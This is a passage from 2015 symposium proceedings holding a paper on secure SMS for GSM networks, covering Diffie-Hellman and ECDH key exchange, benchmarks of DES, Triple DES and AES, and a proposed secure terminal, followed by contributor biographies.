This secret key ‘k’ is used to encrypt and decrypt message between Sender MS and receiver MS. But this approach is infected with man-in-middle attack.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 68

Fig. 3. Public keys Exchange

As a solution to this, each party signs its own Diffie-Hellman (DH) value to prevent man-in-middle attack (and the peer’s DH value as a freshness guarantee against replay attack). This process can be found in Fig. 4. MS2 concatenates the pair (y1, y2), signs them using digital signature of MS2, and then encrypts them with ‘k’ and then sends the cipher text along with y2 to MS1. MS1 decrypts and verifies MS2's signature. Similarly, MS1 concatenates the pair (y2, y1), signs them using the digital signature of MS1, and then encrypts them with ‘k’ and then sends the cipher text to MS2. MS2 decrypts and verifies MS1's signature. MS1 and MS2 are now mutually authenticated and have a shared secret key ‘k’. Here, we are restricted to discuss the different approaches of digital signatures and their key management and this discussion is out of the scope of this paper. But, this approach is also infected with Identity Misbinding Attack. Let’s consider a situation like in Fig. 5 and assume an attacker as ‘A’. Here A doesn’t know ‘k’ but MS2 considers anything sent by MS1 as coming from attacker ‘A’. One solution to this problem may be like in Fig. 6. Here, digital signature is created using (y1, y2 and MS identity). Digital signature is generated with MS’s private key and verified with MS’s public key. Attacker ‘A’ can generate neither SIG (y1, y2, MS1) nor SIG (y2, y1, MS2) which can only be generated by MS1 and MS2 respectively. But one possibility may be to replace the value of y1 by attacker ‘A’. This process can generate the integrity issues. To maintain the integrity in the communication between MS1 and MS2, a hash function is used to create message digest of the sending data y1 and (y1, y2) as H(y1) and H(y1, y2) respectively. MD5 or SHA1 can be used as an efficient hash function. This process as shown in Fig. 7 and is secured enough for key management.

Fig. 4. Added Signature to DH

Fig. 5. Identity Misbinding Attack by Attacker ‘A’

Fig. 6. Solution to Identity Misbinding Attack

Fig. 7. Secure Data Exchange in DH with Integrity

Elliptic Curve Diffie–Hellman Key Exchange: Another approach for key exchange can be done using Elliptic Curve Diffie–Hellman protocol (ECDH) that allows two parties, each having an elliptic curve public-private key pair, to establish a shared secret over an insecure channel and this shared secret may be directly used as a key. Each party must have a key pair suitable for elliptic curve cryptography, consisting of private key ‘d’ which is a randomly selected integer in the interval [1, n-1] and a public key ‘Q’ where Q = d*G. Now, both MS will generate a new secret private keys from their Kc (as Kc is stored in SIM and was used in authentication process) and let’s consider them as d1 and d2 respectively where d1<p and d2 <p. Let MS1’s key pair be (d1, Q1) and MS2’s key pair be (d2, Q2) where Q1 and Q2 are the public keys of MS1 and MS2 respectively as Q1 = d1*G and Q2 = d2*G. Now these public values need to be exchanged between MS1 and MS2 as shown in Fig. 8. After exchange MS1 computes parameter (Xk, Yk) = d1*Q2 and, MS2 computes parameter (Xk, Yk) = d2*Q1. Here, Xk is shared secret key which is generated at both MS1 as well as MS2 as: Xk=d1*Q2=d1*d2*G = d2*d1*G = d2*Q1.

Fig. 8. Secure Data Exchange in ECDH with Integrity

No party other than MS1 can determine MS1's private key, unless that party can solve the elliptic curve Discrete Logarithm problem and MS2's private key is similarly secure. No party other than MS1 or MS2 can compute the shared secret, unless that party can solve the Elliptic Curve Diffie-Hellman problem.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 69

B. Symmetric Encryption Approach and Experimental Setup

J2ME the WMA (Wireless Messaging API) provides tools for sending and receiving SMS messages. Our solution based on symmetric cryptography (DES, Triple DES, and AES) is simulated with Java MIDlet, which is an application written in Java for the Micro Edition platform. The application can send and receive SMS messages in binary format using the WMA. Since the J2ME environment does not contain cryptographic algorithms, we use the Lightweight API from the Legion of the Bouncy Castle. Symmetric algorithms DES, TripleDES with 2 keys, TripleDES with 3 keys, and AES have implemented.

The standard key size for DES, TripleDES with 2 keys, TripleDES with 3 keys and AES are 64 bits (out of which 56 bits are used), 112 bits, 168 bits and 128 bits respectively. Fig. 9 and Fig. 10 show the results observed for encryption and decryption with DES, TripleDES with 2 keys, TripleDES with 3 keys, and AES. The results conclude that out of these algorithms AES takes almost minimum time to encrypt and decrypt the SMS with various sizes where one SMS size is 160 characters. As the input of 160 characters each, the algorithms DES, AES, TripleDES2K and TripleDES3K generates 143, 80, 160 and 168 characters cipher respectively. These results can be found in table I. This shows that AES is the best option for this purpose. The results are calculated on 30 times repeat the execution of each of these algorithms. We have also calculated the range of confidence interval (CI), considering it 95% for each algorithm with 160 characters as input because the reported margin of error is typically about twice the standard deviation – the radius of a 95% confidence interval [18] similar to described in [23].

Encryption: DES, T-DES and AES

0

500000

1000000

1500000

2000000

2500000

160 2x160 3x160 4x160 5x160

Message Size --->

Tim

e (

nan

osec.)

---

>

DES

TripleDESK2

TripleDESK3

AES

Fig. 9. Encryption using DES, T-DES, and AES

Decryption: DES, T-DES and AES

0

200000

400000

600000

800000

1000000

1200000

1400000

1600000

160 2x160 3x160 4x160 5x160

Message Size --->

Tim

e (

nan

osec.)

---

>

DES

TripleDESK2

TripleDESK3

AES

Fig. 10. Decryption using DES, T-DES, and AES

TABLE 1. SMS SIZE PAIR (ORIGINAL, CIPHER) IN VARIOUS ALGORITHMS

DES AES TripleDES2K TripleDES3K

160, 143 160, 80 160, 160 160, 168

Table II and table III represents the results of confidence interval for both encryption and decryption of the message (SMS) for 160, 160x2, 160x3, 160x4, and 160x5 characters in length for DES, TripleDES2K, tripleDES3K and AES algorithms. Here, confidence interval is measured in nanoseconds. We use t-distribution to calculate all these parameters. In this whole process, the SMS size from 160 characters to 800 characters is evaluated where more than 160 characters in a SMS needs to be break and concatenated with another SMS. A low standard deviation indicates that the data points tend to be very close to the mean, whereas high standard deviation indicates that the data points are spread out over a large range of values. Thus, AES is strict to its output range and is considered best among them.

TABLE II. CONFIDENCE INTERVAL FOR SMS ENCRYPTION

Para-

meters

CI-160

char

CI-160x2

char

CI-160x3

char

CI-160x4

char

CI-160x5

char

DES 615156 to

2525227

444939 to

2337297

397177 to

2334366

418794 to

2385118

430900 to

2396306

T-

DESK2

423715 to

2437266

384923 to

2548397

480270 to

2696873

448570 to

2578392

533472 to

2694613

T-

DESK3

294704 to

2301896

337878 to

2407877

332541 to

2398940

346447 to

2530239

371517 to

2538104

AES 775058 to 2017472

515608 to 1802398

14850 to 4573891

518174 to 1809940

549579 to 1850251

TABLE III. CONFIDENCE INTERVAL FOR SMS DECRYPTION

Para-

meters

CI-160

char

CI-160x2

char

CI-160x3

char

CI-160x4

char

CI-160x5

char

DES 629011 to

745390

494369 to

750842

521460 to

617265

539561 to

658254

562070 to

666845

T-

DESK2

520563 to

650413

546387 to

716769

582147 to

719667

623106 to

751108

128407 to

3157173

T-

DESK3

520276 to

645226

610201 to

772473

577035 to

688952

625512 to

851052

637007 to

804383

AES 548127 to

602172 526055 to

603419 512970 to

619404 667586 to

704277 678119 to

732740

C. Discussion

Since, we propose Diffie-Hellman and Elliptic Curve Diffie-Hellman protocol for key exchange, so it’s necessary to focus on their security aspects. Authors claim that the proposed algorithm for key exchange is secure because the public key exchange also provides integrity and non-repudiation by including a hash function and digital signature respectively. ECDH is based on elliptic curve, thus it is more secure as every multiplication is done by multiple additions and it is infeasible to construct the original one by any reversible process. It has proved that out of the implemented algorithms DES, TripleDES with 2 keys, TripleDES with 3 keys and AES, the AES algorithm is best suitable for this application. Various attacks have been found on DES and Triple DES including full attack. But no full attack has been found on AES. This algorithm can be used for encryption and decryption process in transmitting secure message.

V. PROPOSED GSM TERMINAL FOR SECURE SMS

In this section, we propose a terminal through which a secure SMS can be sent or received. Our proposed Terminal for sending/receiving SMS in GSM network is similar to the

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 70

M20 terminal [19]. We have incorporated the security aspects as well in the proposed terminal and modified it in such a way that the produced overheads can be minimized. The proposed terminal provides authentication, confidentiality, integrity and non-repudiation services to the transmitted message. For the real GSM network, we propose the cryptographic algorithms should be implemented on the SIM card itself at the time of manufacturing. In fact, we can have a separate SIM card for any security related communication and transaction as the Koreans (in Korea) have separate SIM cards for financial transactions. We consider our proposed approach in this paper as a part of GSM terminal which provides authentication, confidentiality and integrity services to the end user. The non-repudiation service can be provided by (DSA/ECDSA) or (DSA/Variant of ECDSA) digital signature algorithms. These algorithms can be directly stored onto the SIM (for without the use of GSM terminal) or on the terminal device. The digital signature is imposed over the encrypted message; the details of DSA/ECDSA/Variant of ECDSA can be referred in [20]. A proposed GSM terminal can provide the services to both SMS modes: SMS Deliver (Mobile Terminated) as well as SMS Submit (Mobile Originator).

A. Design of Proposed Terminal

This subsection describes the architecture of the proposed GSM terminal as shown in Fig. 11 which provides the authentication, confidentiality, integrity and non-repudiation services in order to secure the transmitted SMS in the network. The maximum data can be occupied in 140 Octets i.e. 1120 bits which means 160 English characters can be written in a single SMS as English characters are encoded with 7-bits encoding scheme (ASCII code, 160*7=1120 bits). In this proposed terminal we have mainly included a bit to check whether encryption is ON/OFF, one bit is to set the ciphering algorithm AES/MAES, one bit is used for the algorithm to maintain data integrity SHA1/HMAC, and one bit is used to set the digital signature algorithm DSA/ECDSA or DSA/Variant ECDSA. Various parameters of the proposed GSM Terminal in both the

modes can be understood as follows:

Service Center Address (SCAddr): It is a maximum of 10 octets and having the length, type of number (National/International) and address of service center.

1 1 0-8 Octets

Length Type of Number BCD Digits

PDU Type: This field is of 1 octet having different 8 parameters each of having 1 bit size.

User Data Header Indicator (UDHI): 0 – Contains only short message, 1 – Contains a header in addition of short message.

Msg Type: 0 – SMS Deliver, 1 – SMS Submit; Encryption Set (E Set): 0 – No, 1 – Yes; Ciphering: 0 – AES, 1 – MAES; Integrity: 0 – SHA1, 1 – HMAC; Digital Signature (DSignature): 0 – DSA, 1 – ECDSA or 0 – DSA, 1 – Variant of ECDSA; More Msg: 0 – No, 1 – Yes; Status report Indication (SRI): 0 – Report will returned to SME, 1 – SMS will returned to SME; Status Report Request (SRR): 0 – No, 1 – Yes.

Note: More Msg and SRI can only be set by Short Message Service Center. If the E bit is 0 then it sends/receive normal message and if E=1 then the Secure Message mode is activated.

Source Address (SAddr) / Destination Address (DAddr): This field is of 10 octets and having the length, type of number (National or International) and address of source/destination.

1 1 0-10 Octets

Length Type of Number BCD Digits

Protocol Identifier (ProtocolID): It is one by which transport layer either refers to the higher layer protocol being used or indicates interworking with a certain type of telemetric device.

Fig. 11. Proposed GSM Terminal for Secure SMS

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 71

Data Coding Scheme (DCScheme): This field is used to code the data present in ‘Data’ field.

7 6 5 4 3 2 1 0

Coding Group 0 X X X

7 – 4 bits: 0000 – Default Alphabets 7 bits 0001 – 1110 Reserved Coding Groups 1111 – (bit number 2 is not used and 1-0 bits can be used in the following combinations: 00 – Immediately Display, 01 – Mobile Equipment Specific, 10 – SIM Specific, 11 – Terminate Equipment Specific

Service Center Timestamp (SCTimestamp): By this field, the SMSC informs the recipient MS about the time of arrival of the SMS at transport layer entity of the SMSC. YY-MM-DD-HH-MM-SS-Timezone

Message Identifier (MsgID): Every MsgID is between Integer values (0…255) and which is automatic generated.

Data Length/ Data: This data field indicates the actual data that are being sent and data length is the total length of data.

1 0-140 Octets

Data Length Data

Further information related to the structure of SMS and its parameters can be accessed from GSM 04.08.10.5.4.6 [21].

B. Hardware Requirements and Setup [19]

This subsection discusses about the hardware requirements and setup phase for the proposed GSM terminal. The following are the hardware requirements to simulate and test our proposed approach in GSM environment: (1) Mobile Phone, (2) A Terminal (proposed in this paper), (3) Two SIM Cards (One for Mobile Phone and the other for proposed Terminal), (4) GSM Antenna, (5) A power cable for proposed Terminal, (6) RS-232 cable, (7) A PC running on Windows Terminal or Hyper Terminal. Now, here various steps to setup the hardware are stated below: (1) The first thing is to make ready mobile phone with a SIM Card, (2) Terminal Setup Preparation: Run Windows Terminal or Hyper terminal Connect the proposed Terminal to COM1 or COM2 of PC Insert SIM into the proposed Terminal and turn it ON In Windows Terminal, select [Communication] from [Setting] and set the proposed Terminal to the parameters as: Baud Rate: 19200 bps, Data Bits: 8, Stop Bits: 1, Parity: None, Flow Control: Hardware, Connector: COM1 or COM2 Reset the proposed Terminal to factory default using AT&F and hence configure the proposed Terminal for SMS using the various AT commands.

VI. CONCLUSION

We conclude that the proposed approach based on ECDH is suitable for key exchange while transmitting the SMS from one mobile to another. Symmetric algorithms are faster than asymmetric algorithms, thus we implemented DES, TripleDES with 2 keys, TripleDES with 3 keys and AES. Out of these algorithms, AES is the best algorithm to provide ciphering to the SMS during transmission. Authors also proposed a GSM terminal device for providing authentication, confidentiality, integrity, and non-repudiation services with SMS.

ACKNOWLEDGMENT

This work is supported by TCS, India.

REFERENCES

[1] Tele-Log, 2009. [Online]. http://www.tele-log.com/domotica-e.html.

[2] T. C. Lim, H. K. Garg, “Designing SMS applications for public transport service system in Singapore,” 8th Intern. Conf. on Communication Systems, vol. 2, pp. 706– 710, 2002.

[3] M. R. Hashemi, E. Soroush, “A secure m-payment protocol for mobile devices,” Canadian Conference on Electrical and Computer Engineering, pp. 294–297, 2006.

[4] D. Green, “South Africa: novel approach to improving adherence to TB treatment,” Essential Drugs Monitor, No 33, 72 page, 2003.

[5] S. Treweek, “Joining the mobile revolution,” Scandinavian Journal of Primary Health Care, 2003.

[6] Show tickets sold on mobile phone in Singapore, 2003. [Online]. http://www.m-travel.com/news/2003/07/show-ticketsso.html.

[7] G. Peersman, S. Cvetkovic, “The Global System for Mobile Communications Short Message Service,” IEEE Personal Communications, pp. 15-25, 2000.

[8] D. Lisonek and M. Drahansky, “SMS encryption for mobile communication,” International Conference on Security Technology Hainan Island, pp. 198 – 201, 2008.

[9] S. Doyle, “Using short message service as a marketing tool,” Journal of Database Marketing. vol. 8, pp. 273-277, 2001.

[10] M. Toorani and A. B. Shirazi, “SSMS-A secure SMS messaging protocol for the m-payment systems,” 13th IEEE Symposium on Computers and Communications, Marrakech, pp. 700-705, 2008.

[11] S. Zhao, A. Aggarwal, S. Liu, “Building secure user-to-user messaging in mobile telecommunication networks,” Proceedings of Wireless Telecommunications Symposium, pp. 151-157, 2008.

[12] H. Harb, H. Farahat, M. Ezz, “SecureSMSPay: secure SMS mobile payment model,” 2nd International Conference on Anti-counterfeiting, Security and Identification, pp. 11- 17, 2008.

[13] J. J. Garza-Saldana and A. Diaz-Perez, “State of security for SMS on mobile devices,” Proceedings of the Electronics, Robotics and Automotive Mechanics Conference, pp. 110 – 115, 2008.

[14] P. H. Kuaté, J. L. Lo and J. Bishop, “Secure asynchronous communication for mobile devices,” Proceedings of the Warm up Workshop for ACM/IEEE ICSE. Cape Town, pp. 5-8, 2009.

[15] Ruangchaijatupon, P. Krishnamurthy, “Encryption and Power Consumption in Wireless LANs-N,” The Third IEEE Workshop on Wireless LANs, Newton, Massachusetts, pp. 27-28, 2001.

[16] Hardjono, Security In Wireless LANS And MANS, Artech House Publishers, 2005.

[17] G. A. Safdar, C. McGrath, M. McLoone, “Limitations of Existing Wireless Networks Authentication and Key Management Techniques for MANETs,” IEEE International Symposium on Computer Networks. (ISCN'06), pp. 101-105, 2006.

[18] [Online]. http://www.stat.yale.edu/Courses/1997-98/101/confint.htm

[19] [Online]. http://www.gsmfavorites.com/documents/ sms/packetformat/

[20] N. Saxena, N. S. Chaudhari, “Secure Encryption with Digital Signature Approach for Short Message Service,” WICT, pp. 803-806, 2012.

[21] GSM Technical Specification Digital cellular telecommunications system (Phase 2+); Mobile radio interface layer 3 specification (GSM 04.08), TS/SMG-030408Q, 1995.

[22] N. Saxena, N. S. Chaudhari, “An Enhanced NPA Protocol for Secure Communications in GSM Network,” Intern. J. of Security and Networks (IJSN), Vol. 8, No. 1, pp. 13-28, 2013.

[23] N. Saxena, N. S. Chaudhari, “EasySMS: A Protocol for End-to-end Secure Transmission of SMS,” IEEE Transactions on IFS, Vol. 9, No. 7, pp. 1157-1168, 2014.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 72

AUTHOR BIOGRAPHIES

Pradeep K. Atrey is an Assistant Professor at the State University of New York, Albany, NY,

USA. He is also an (on-leave) Associate Professor at the University of Winnipeg, Canada and an

Adjunct Professor at University of Ottawa, Canada. He received his Ph.D. in Computer Science

from the National University of Singapore, M.S. in Software Systems and B.Tech. in Computer

Science and Engineering from India. He was a Postdoctoral Researcher at the Multimedia

Communications Research Laboratory, University of Ottawa, Canada. His current research

interests are in the area of Security and Privacy with a focus on multimedia surveillance and

privacy, multimedia security, secure-domain cloud-based large-scale multimedia analytics, and

social media. He has authored/co-authored over 90 research articles at reputed ACM, IEEE, and

Springer journals and conferences. His research has been funded by Canadian Govt. agencies

NSERC and DFAIT, and by Govt. of Saudi Arabia. Dr. Atrey is on the editorial board of several

journals including ACM Trans. on Multimedia Computing, Communications and Applications,

ETRI Journal and IEEE Communications Society Review Letters. He was also guest editor for

Springer Multimedia Systems and Multimedia Tools and Applications journals. He has been

associated with over 30 international conferences/workshops in various roles such as General

Chair, Program Chair, Publicity Chair, Web Chair, Demo Chair and TPC Member. Dr. Atrey

was a recipient of the Erica and Arnold Rogers Award for Excellence in Research and

Scholarship (2014), ETRI Journal Best Editor Award (2012), ETRI Journal Best Reviewer

Award (2009) and the three University of Winnipeg Merit Awards for Exceptional Performance

(2010, 2012 and 2013). He was also recognized as “ICME 2011 – Quality Reviewer.”

Thomas A. Babbitt is a United States Army Fellow and Doctoral Candidate in the Department

of Computer Science, Rensselaer Polytechnic Institute (RPI). He is a former Instructor and

Assistant Professor in the Department of Electrical Engineering and Computer Science, United

States Military Academy, West Point, is a member of the IEEE Computer Society and

Association for Computing Machinery. His current research interests include networking,

network security, resource constraint networks and Computer Science and Information

Technology education.

Daniel Bogaard is an Associate Professor in the Information Science and Technologies

Department at the Rochester Institute of Technology. He is a distinguished scientist in

information delivery, web application development and web security. His teaching and research

interests include Web-based communication, security, access, and application development –

specifically employing emerging technologies. He has been part of numerous research grants,

including awards by the National Science Foundation (NSF), National Institutes of Health (NIH),

NYS Department of Health, and Rochester General Hospital.

Anthony Califano is a digital media program manager with the Office of the New York State

Comptroller (OSC). His work involves developing social media marketing strategies and

associated communications tools that support OSC’s programs and initiatives. Before managing

social media, he was a web developer and graphic designer specializing in web 2.0, rich internet

applications, video production, and multimedia design. He received his M.B.A. with a

specialization in Information Technology Management from the University at Albany (SUNY)

in 2015, and his B.F.A. in Graphic Design from the Rochester Institute of Technology in 2002.

He also received his certification as a usability analyst (CUA) from Human Factors International

in July of 2008. His current research interests include smart grid, green energy, cyber security,

UX, usability and accessibility issues, and social media.

ASIA '15 73

Reiner Campillo received his MSc. (2014) degree in Networking and System Administration

from Rochester Institute of Technology. He is currently technical manager at the National

Research and Education Network of the Dominican Republic. His current research interests are

data communication protocols, information security and Ethernet technologies.

Ming-Ching Chang is a computer scientist of the Computer Vision Laboratory at the GE Global

Research Center in Niskayuna, NY, USA and an adjunct professor of the Computer Science

Department at the University at Albany, State University of New York (SUNY). His research

area includes computer vision and video analytics. He was a research assistant in the Laboratory

for Engineering Man/Machine Systems (LEMS) at Brown University, where he received his

Doctoral in Engineering in 2008. He was a research assistant in the Mechanical Industry

Research Laboratories, Industrial Technology Research Institute (Taiwan). He received the M.S.

degree in computer science and information engineering in 1998 and the B.S. degree in civil

engineering in 1996, both from the National Taiwan University. Dr. Chang has authored more

than 35 peer-reviewed journal and conference publications. He frequently serves as a reviewer

for mainstream journals and conferences.

Manmohan Chaturvedi is a retired Air Commodore from Indian Air Force with PhD in

Information Security domain from IIT Delhi. He has about 35 years of experience in managing

technology for IAF. An alumnus of National Defense College, New Delhi, he has held various

appointments dealing with operational and policy dimensions of Information and

Communication Technology. He graduated from Delhi College of Engineering and completed

post-graduation from IIT Delhi. He has research interests in vulnerability of evolving ICT

infrastructure and protection of Critical Information Infrastructure.

Narendra S. Chaudhari has completed his undergraduate, graduate, and doctoral studies at

Indian Institute of Technology (IIT), Mumbai, India. He has shouldered many senior level

administrative positions in universities in India as well as abroad including Dean- Faculty of

Engineering Sciences, Devi Ahilya University, Indore, India, Coordinator-International

Exchange Program, Nanyang Technological University (NTU), Singapore, Deputy Director -

GameLAB, Nanyang Technological University, Singapore. He is currently with Indian Institute

of Technology, Indore, India since Aug 2009 as a Professor of Computer Science and

Engineering. Since Sept 2010, he has also been Dean-R&D, IIT Indore, India. Since 2001 to July

2009, he was with the School of Computer Engineering, NTU, Singapore. He has been invited as

a keynote speaker in many conferences. He has been a referee and reviewer for a number of

premier conferences and journals including IEEE Transactions, Neurocomputing, etc. He has

more than 240 publications in top quality international conferences and journals. His current

research work focus is on network security, algorithms, game AI, grammar learning, and novel

neural network models like binary neural nets and bidirectional nets. His research interests

include network protocols, parallel computing, optimization algorithms, and theoretical computer

science. He is Fellow of the Institution of Engineers, India (IE-India), as well as Fellow of the

Institution of Electronics and Telecommunication Engineers (IETE), Senior member of

Computer Society of India, Senior Member of IEEE, Member of Indian Mathematical Society,

Member of Cryptology Research Society of India, and many other professional societies.

Ersin Dincelli is a Ph.D. candidate in the Department of Informatics and an adjunct professor in

the Department of Information Technology Management at the University at Albany, the State

University of New York. He works as a research analyst at the New York State Center for

Information Forensics and Assurance (CIFA) focusing on multiple research projects including

investigating cultural and socio-psychological impacts on information security behavior,

behavioral differences on online social networks, and self-organization in the context of complex

ASIA '15 74

traffic systems. He received his M.B.A. with a specialization in Information Technology

Management from the University at Albany, and his B.A. in Economics from Uludag University

in Turkey. His research interests are in the area of behavioral security, social engineering, cyber

behavior, and social media.

Sanjay Goel is an Associate Professor and Chair of the Information Technology Management

Department in the School of Business, and the Director of Research at the NYS Center for

Information Forensics and Assurance at UAlbany. He is also the Director of the Digital

Forensics Program at the University. Dr. Goel received his Ph.D. in Mechanical Engineering

from RPI. His research interests include information security, security of cyber physical systems,

music piracy, cyber warfare and self-organization in complex systems. His research on self-

organizing systems includes traffic light coordination, smart grid and social networks. He is lead

author of Smart Grid Vision prepared by IEEE Communications Society and the IEEE Standards

Association. He won the promising Inventor’s Award in 2005 from the SUNY Research

Foundation. In 2006, he was awarded the SUNY Chancellor’s Award for Excellence in

Teaching, the UAlbany Excellence in Teaching Award, and the Graduate Student Organization

Award for Faculty Mentoring. In 2010 he was awarded the UAlbany Excellence in Research

Award. He was also awarded the Excellence in University Service award in 2015 and is the only

faculty in the history of the University who has received excellence awards in all three categories

i.e. research, teaching, and service. He was named one of the three AT&T Industrial Ecology

Faculty Fellows for 2009-2010. He has received grant funding from multiple sources including:

National Institute of Justice, U.S. Department of Education, National Science Foundation,

Region II University Transportation Research Center, New York State Energy Research and

Development Agency (NYSERDA), AT&T Foundation and James S. McDonnell Foundation.

He has over 75 articles in refereed journals and conference publications including top journals

such as the California Management Review, IEEE Journal of Selected Areas in Communication,

Decision Support Systems, Communications of the AIS, Communications of the ACM and the

Information & Management Journal. In addition, he has been invited to present at 35 conferences

including over 10 keynotes and plenary talks. He is a recognized international expert in

information security, cyber warfare, and smart grid and has given plenary talks in events across

several countries including, U.S., Germany, Russia, Serbia, Croatia, and India that have been

sponsored by NATO, OSCE, and other professional organizations. He has given several plenary

talks and cyber hacking demonstrations at the NYS Cyber Security Conference to very large

audiences. He is a part of the “Group of Experts” for the Office of Security Cooperation in

Europe’s (OSCE) Action against Terrorism Unit as well as the Partnership for Peace Consortium

at the Marshall Center in Germany. He is the UAlbany representative of the Capital Region

Cyber Crime Partnership and is one of the key members of the international volunteer group

Project Grey Goose, which investigates incidents of cyber warfare around the world. He

established the Annual Symposium on Information Assurance as an academic symposium held in

conjunction with the NYS Cyber Security Conference and has served as its chair. In its tenth

year now, it has received universal acclaim from both academics and practitioners in the field.

He also initiated and served as the general chair for the International Conference on Digital

Forensics and Cyber Crime (ICDF2C) and hosted the first event in Albany in collaboration with

the NYS Police and the NYS Department of Criminal Justice Services.

Srishti Gupta is a final year student of MS (Software Engineering) program in VIT University-

Chennai (India). She had experience working with ‘Government Advisory’ at KPMG India

(Gurgaon) as summer intern (2014); on ‘Analytics’ with ‘R’ at Info Edge India Ltd.

(Naukri.com) during Dec 2013;with Microsoft India (Gurgaon) during summer 2013 and with

Web Development Group (National Informatics Centre, New Delhi) during Dec 2012..She is a

ASIA '15 75

Member of the Computer Society of India (CSI).

Bryan Harmat is a graduate student in the Department of Computing Security at the Rochester

Institute of Technology.

Delbert Hart is an Associate Professor in the Computer Science Department at SUNY

Plattsburgh. He earned his D.Sc. in Computer Science at Washington University in St. Louis.

His research interests are Computer Security, Computer Science Pedagogy, and Distributed

Systems.

Hemantha Herath is a Professor of Managerial Accounting in the Goodman School of Business

at Brock University. Previously, he was an assistant professor at University of Northern British

Columbia and a consultant in the Oil and Gas Division of The World Bank, Washington D.C. He

holds Ph.D. and M. Sc. degrees in Industrial and Systems Engineering from Auburn University,

USA. His research interests include real options, risk management, performance measurement,

and IT security. He has published articles in a variety of journals including, Journal of

Accounting and Public Policy, Journal of Management Information Systems, The Engineering

Economist, and Journal of Economics and Finance. He is a two time recipient of the Eugene L.

Grant Best Paper Award from the American Society of Engineering Education (ASEE) (2001

and 2008). He currently serves as an area editor for The Engineering Economist. He is also a

member of Sigma Xi- research honor society.

Tejaswini Herath is an associate professor in the Goodman School of Business at Brock

University, Canada. Previously she worked as a systems analyst and part-time lecturer at

University of Northern British Columbia (UNBC), Canada. She graduated from Department of

Management Science and Systems at State University of New York, Buffalo (UB). She also

holds NSA certified Certificate in Information Assurance and is a Certified General Accountant

(CGA) Canada. Previously she worked as a systems analyst at University of Northern British

Columbia, Canada. She has published articles in the Journal of Management Information

Systems, Decision Support Systems, European Journal of Information Systems, Information

Systems Journal, among others.

Yuan Hong is an Assistant Professor in the Department of IT Management, and a faculty

associate in the Forensics, Analysis, Complexity, Energy, Transportation and Security

(FACETS) Center at University at Albany, SUNY. He received the Ph.D. degree in Information

Technology from Rutgers University, the M.Sc. in Computer Science from Concordia

University, Canada, and the B.Sc. from Beijing Institute of Technology, China. His research

interests span a wide range of topics in Security, Privacy, Digital Forensics and Data Analytics,

primarily tackling security and privacy issues in various contexts such as web search, data

mining, supply chain management, health informatics, smart grid, social network, location-based

services, etc. He has published more than 20 peer-reviewed journals and conferences in the

above areas, including the top venues such as IEEE Transactions on Dependable and Secure

Computing (TDSC), Journal of Computer Security (JCS), ACM International Conference on

Information and Knowledge Management (CIKM), ACM International Conference on Extending

Database Technology (EDBT), and IEEE International Conference on Data Mining (ICDM). He

also regularly serves as the program committee member and referee for major conferences and

journals in the above areas (e.g., TDSC, TKDE, TIFS, TCC, JCS, ESORICS, DBSec).

Daryl Johnson, associate professor of computing security, has developed over thirteen and co-

developed over a dozen new courses in the areas of security, networking, and systems

administration as well as redesigning and contributing to many others. He has been involved in

the creation of three departments and five degrees including Computing Security department,

ASIA '15 76

Networking, Security and Systems Administration department, and Information Technology

department and their associated degrees. Most of his attention over the last decade has been in

the area of computer and network security with a focus on Covert Communication, Botnet

command and control, mobile security, and application of virtualization in the security field. He

has authored over three dozen papers in the security area. He was one of the founders of the

Northeast Collegiate Cyber Competition and is served for 8 years as their Red Team Captain.

Shreshth Kandari is a graduate student in the Department of Information Science and

Technology at Rochester Institute of Technology.

Victoria Kisekka is a PhD student at the University at Buffalo, School of Management. Her

research area is Cybersecurity and resilience. Other research interests include patient safety on

online social networks. She has received scholarships from the National Science Foundation and

the (ISC)² Woman's Scholarship respectively. Her past experience in Cybersecurity was

acquired through her role as a research aide at Argonne National Laboratory and as a graduate

assistant for the Information Assurance lab at the University at Buffalo. Prior to joining the

University at Buffalo, she received a Master’s in Information Systems from Drexel University

and a Bachelor’s of Science in Computer Science from Shippensburg University.

Siwei Lyu received his B.S. degree (Information Science) in 1997 and his M.S. degree

(Computer Science) in 2000, both from Peking University, China. He received his Ph.D. degree

in Computer Science from Dartmouth College in 2005. From 2000 to 2001, he worked at

Microsoft Research Asia (then Microsoft Research China) as an Assistant Researcher. From

2005 to 2008, he was a Post-Doctoral Research Associate at the Howard Hughes Medical

Institute and the Center for Neural Science of New York University. Starting in 2008, he was

Assistant Professor at the Computer Science Department of University at Albany, State

University of New York, and was promoted to Associate Professor in 2014. Dr. Lyu is the

recipient of the Alumni Thesis Award of Dartmouth College in 2005, IEEE Signal Processing

Society Best Paper Award in 2010, and the NSF CAREER Award in 2010. He has authored one

book, and held two U.S. and one E.U. patents. He has published more than 50 conference and

journal papers in the research fields of natural image statistics, digital image forensics, machine

learning, and computer vision.

Namunu C. Maddage is a Cloud computing executive, Data scientist and Technopreneur. He

has over 15 years of experiences advancing multimedia system technologies to develop web

application for healthcare, data security and entertainment sectors in Australia and South East

Asia. He serves as an international technology reviewer at the editorial boards of premium

computer science conferences and Journals. He has published over 50 journals, conference and

patent articles related digital content analysis and semantic retrieval. In 2013, Dr. Maddage co-

founded a cloud based multimedia technology development and commercialization company

NextGmultimedia Pty Ltd. The NextG team (company) provides end-to-end cloud technology

solutions, in close collaboration with universities, research institutes, start-ups, and entrepreneurs

to improve well-being. For example, together with NextG team, Dr. Maddages developed the

cognitive analytic platform in 2014 for the brain training project.

George Markowsky is currently Professor of Computer Science at the University of Maine. He

holds a Ph.D in Mathematics from Harvard University. He spent ten years at the IBM Thomas J.

Watson Research Center where he served as Research Staff Member, Technical Assistant to the

Director of the Computer Science Department, and Manager of Special Projects. Dr. Markowsky

was the Founding Chair the Computer Science Department. He has served as Chair of the

Computer Science Department on numerous occasions, and has also served as Chair of the

Mathematics and Statistics Department. He has served as Associate Director of the School of

ASIA '15 77

Computing & Information Science at the University of Maine. Dr. Markowsky has held visiting

positions at RPI and RIT as well served as Founding Dean of the American-Ukrainian Faculty at

